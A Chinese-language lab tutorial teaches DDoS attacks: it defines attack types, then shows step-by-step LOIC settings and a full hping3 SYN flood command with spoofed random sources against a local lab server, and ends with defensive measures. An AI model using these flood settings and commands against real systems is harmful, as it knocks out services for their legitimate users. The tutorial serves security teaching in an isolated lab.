新闻上经常会看到DDOS攻击层出不穷，那什么是DDOS攻击呢？今天橙学社的Rose老师就带领大家走进DDOS实战攻击的神秘大门。

DDoS攻击，全称为分布式拒绝服务攻击（Distributed Denial of Service），是一种常见的网络攻击手段。其目的是使网络服务不可用，阻止合法用户的访问。

在DDoS攻击中，攻击者通常利用多个受他们控制的网络设备（如计算机、物联网设备等）发起大量的请求，这些请求会耗尽目标服务器的资源，导致正常用户无法获得服务。这些被控制的设备通常被称为“僵尸网络”（botnet），攻击者通过恶意软件感染这些设备，使它们成为攻击的一部分。

流量攻击（Volumetric Attacks）：这是最常见的DDoS攻击，目的是耗尽目标网络的带宽。攻击者发送大量的垃圾流量以使网络拥塞，正常的流量无法通过。

协议攻击（Protocol Attacks）：这种攻击对服务器资源或中间通信设备（如防火墙、负载均衡器）的资源进行消耗，如发送大量的SYN请求来耗尽TCP连接的服务器资源。

应用层攻击（Application Layer Attacks）：这种攻击针对的是特定应用层服务，如HTTP、DNS等。攻击者发出看起来合法但实际上是恶意的请求，目的是使应用服务器或服务崩溃。

1、VMware中安装一台Windows7、配通网络、关闭防火墙。

如图：网络已通

防火墙已关

2、安装phpstudy，并下载“记时网站”的源码，完成快速搭建。

网站源码：

https://www.cpolar.com/static/downloads/meditation-app-master.zip

3、下载LOIC（此实验只用于网络安全教学，就不附下载链接了哈）

1、填入被攻击的网站IP：

http://192.168.2.136/app。

2、Port填写80、请求方法选择TCP、攻击线程调到100、发送包的速度拉到最左边最大值。

3、点击IMMA CHARGIN MAH LAZER开始攻击。

1、网站被攻击前后截图。

攻击前：

攻击后，网站无法访问：

1、安装kali、Windows7。

hping3是kali中的默认安装的一款网络探测和攻击工具，其主要用途是进行网络测试和攻击，例如探测端口、分析网络性能、模拟网络流量等，它是用于对防火墙和网络执行安全审计和测试的工具之一，本身是一个安全测试工具，也可以被用作攻击工具使用，进行数据泛洪，从而引起拒绝服务

攻击机：kali虚拟机

192.168.2.128

靶 机：Win7

192.168.2.134

2、关闭防火墙、保证网络畅通。

1、了解hping3

以下是hping3的一些常用参数，以及它们的含义：

-c：设置发送数据包的数量

-d：设置每个数据包的大小

-i ：设置数据包之间的时间间隔

-w：设置TCP窗口大小

-a：设置发起数据包的源IP地址

-k：保留root权限使用

-q：只输出关键信息到stdout

-p：设置目标端口，缺省为0

-S：表示发送TCP SYN包

-F：表示发送TCP FIN包

-P：表示发送ICMP包

--help：查看帮助信息

--fast：快速扫描模式

--flood：发送数据包并不等待响应（洪水攻击）

--rand-dest：随机化目标IP地址

--rand-source：随机源地址模式

--udp：发送UDP包

--tcp-timestamp：设置TCP包时间戳

--traceroute：扫描路径中的每个路由器

2、打开本地的网站（apache）服务

这里用自己本地搭建的一个网站来进行实验

http://192.168.2.136/app

3、开始攻击

现在我们进入我们的kali攻击机，对我们自己的网站进行一个攻击：

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.2.136

hping3：应用名称

-c 10000：需要发送的包（packets）的数量（非必须）

-d 120：包（packets）的大小（非必须）

-S：只发送SYN packets

-w 64：TCP窗口（Windows）的大小（非必须）

-p 80：80端口（根据实际情况修改即可）

–flood：泛洪攻击模式

–rand-source：伪造随机的源IP地址

ip / 域名(xxx.com)：需要攻击的目标ip或主机域名（最好不要带htts:// 和 www）

攻击成功

win7直接瘫痪，进入虚拟机都进不了。

网站已经无法访问

DDOS攻击直接对服务器、网站、终端的可用性造成损害。那我们该怎么防御此类攻击呢？

DDoS攻击的防御措施包括：

流量分析（Traffic Analysis）：监测网络流量，使用防火墙、入侵检测系统等工具分析流量模式，从而检测异常。

带宽扩容（Bandwidth Overprovisioning）：提前为网络设施配置额外的带宽，以应对可能的流量高峰。

DDoS防御解决方案（DDoS Mitigation Solutions）：使用专业的DDoS防御服务，如云平台提供的分布式拒绝服务保护。

混合防御策略（Hybrid Defense Strategy）：结合硬件和软件的多层防御策略，以提高整体的安全防护。

响应计划（Response Plan）：准备好应对DDoS攻击的计划，包括急救措施和事后恢复操作。

应对DDoS攻击需要综合考虑众多因素，包括技术手段、预防策略以及快速响应的能力。由于攻击方法不断进化，保持警惕并更新防护措施是非常必要的。

最后Rose老师还得和大家强调一下：千万不要用于实际的IT攻击目标！切记此教程仅限于教学！请大家务必遵守网络安全法！